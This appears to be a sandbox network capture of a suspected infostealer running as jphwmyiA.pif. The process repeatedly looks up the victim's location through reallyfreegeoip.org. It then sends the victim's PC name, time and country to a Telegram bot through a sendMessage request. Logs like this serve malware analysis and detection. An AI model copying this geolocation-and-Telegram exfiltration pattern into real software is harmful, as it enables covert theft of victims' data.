2025-01-06 06:58:08 UTC	867	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461477 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYJBx3yf4g2hS9zsJclhGwl94BA8pnByID4gcCun4UB%2FffINNgyOtM8a4cwb2k%2BS9w9plpxxij3w4TVFK2wf2MjD%2FPMdh%2FVCB2ag9v%2FXVDv6rf%2FPA%2FpCcrfKv4Z%2BfasZtJ%2Bc9cib"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d162fed58cca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2001&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1422308&cwnd=239&unsent_bytes=0&cid=5f6839bd1b362705&ts=163&x=0"
2025-01-06 06:58:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:09 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461478 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gbNd51bHrPieX%2FQmo8OaJXBZAvXEUHmwpZApE%2FRISPWrTXdjx%2BM0%2BFSafoG6bKLfuSrxk8oi3cMDZO%2F5CUhIbk69xlsMfLWq9FmGFJwmvzCiKfHxSbUwIje2sePp%2FRq9%2BczqBVEH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d16b084b43c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1541&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1794714&cwnd=211&unsent_bytes=0&cid=f7fb7a8325bfbdbf&ts=131&x=0"
2025-01-06 06:58:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:11 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461480 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRe43SKKlua7bfjQP8xdi7eKYR5wPwGWM%2F29uVL18J8MGvJsYiDOG7KiCnBDezW31JCD%2FiW0ZF2ucxdL4JonxtzhPn%2BZU1VUK3GmtT6Z5poZudwXdZ9rTkGQPhaKp0IG2p%2Fr5fUf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1733b7d17b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1428&min_rtt=1421&rtt_var=548&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1967654&cwnd=252&unsent_bytes=0&cid=6afc8ba61f06587f&ts=155&x=0"
2025-01-06 06:58:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:12 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461481 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DhrqlRwptjdsEkNmrOU%2BTy%2FEHV6E0zB5LT9FvU48BdpymjR2k0xFcrbdhyBTOSlx8oj%2B8R8qMABP7eJrMnVBk8ihrSaMAkfEal6gh%2BzvtcW5YB1Ew3r4LEzXzLmWBMBf22esqafC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d17c3db00f7f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1490&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1885087&cwnd=243&unsent_bytes=0&cid=e1c985c7bf1f510b&ts=143&x=0"
2025-01-06 06:58:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:14 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461483 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dexe6qUAevluZip%2BZS7pBGg5MoIcVgz9KE4lXeiRby1U54S7u2Q2%2FNwvavj%2BMXuzal4JnelFQp5I7TDU4cBIcaOjc4SF7HQx6Anl6MbpcSyD%2FpV5gBAVovPGPC2Y7ewuPl3d0EKH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1867dc2f793-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1432&rtt_var=558&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1922317&cwnd=152&unsent_bytes=0&cid=f82bca2e968ca340&ts=137&x=0"
2025-01-06 06:58:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:15 UTC	865	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461484 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg40yQFCy%2FUBNB3dQLxYzcqeTgVTQZceRtYkTns%2BdEGNpWLshqiLM%2BBrMif0e09b1gt%2BwjXtTiwC%2FuZt%2FGMiXgU1fL4TQ3AIeSenfgKhfN0gafPQqEYuFaYpKt3n%2F3cg3%2FeObcoB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d18f0fec0f81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1477&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1879021&cwnd=239&unsent_bytes=0&cid=db28740d0b38f9e7&ts=139&x=0"
2025-01-06 06:58:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	149.154.167.220	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:16 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:33:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-06 06:58:16 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:58:16 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:58:16 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:17 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461486 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOSvlAqCeNm2a5Uo14XyfnP%2FmiUzfmEsZK%2BUR%2F0Ney0poVO%2B56PnkCZIL41d0WniFx8GUfO37XNBVoN6m3G5ojEg6ITY4c811qFa7NU8Dr6T%2F8S2P%2F89wQaB41eugnNNnpPI9z0b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d19bcda5335a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2168&min_rtt=1966&rtt_var=881&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1485249&cwnd=232&unsent_bytes=0&cid=97a5f8cc29d210d5&ts=186&x=0"
2025-01-06 06:58:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49758	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:18 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:18 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461487 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgA5qAVZJjavFxxsXBIe9Cje7J6tg2js6K%2F1NjN24ldsjMWQITpZ0%2BI1JHRrc7kSDnWl8fTpj6GlZOxkh%2Fh%2F0VbfrcsvH%2FZEdRz42Nyia8AQDVlbcBy9%2F66X0zIt3R6Z8%2FXTinT6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1a2285b4262-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2135&rtt_var=802&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1363848&cwnd=190&unsent_bytes=0&cid=e3c4a0d0a5baa618&ts=134&x=0"
2025-01-06 06:58:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:19 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461489 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UZ3zpEsV1IC3ItJvEWnFCF9hU6aE%2BLTBNWx3gL%2BY%2BIa2EMONaNrZmwZJ5p8H%2FmVTEXXvLnmXdnEwxBxIspZOGkvZHJqERKLELpdau9ERLFyCXDV76tZTF75tD0rxe%2BwTKoz7hy6e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1aa6879ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1871&rtt_var=711&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1527995&cwnd=219&unsent_bytes=0&cid=3495607ddc1f87a1&ts=157&x=0"
2025-01-06 06:58:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:21 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461490 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FUTbIHLI9W3xSU165eZnAzAL5JnZAWxQ5tqPgL8cNaUU9%2BitCXgehFxnPxzoKvBxVeG0Lrpe5efLNcZGmWVoHNzwpUyU34YwGanquQf899ZJTriB2vFrh0y%2Be8%2BTFcHp8yEWYFl1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1b2dc660cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1578&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1799137&cwnd=219&unsent_bytes=0&cid=99181763ba042d8f&ts=135&x=0"
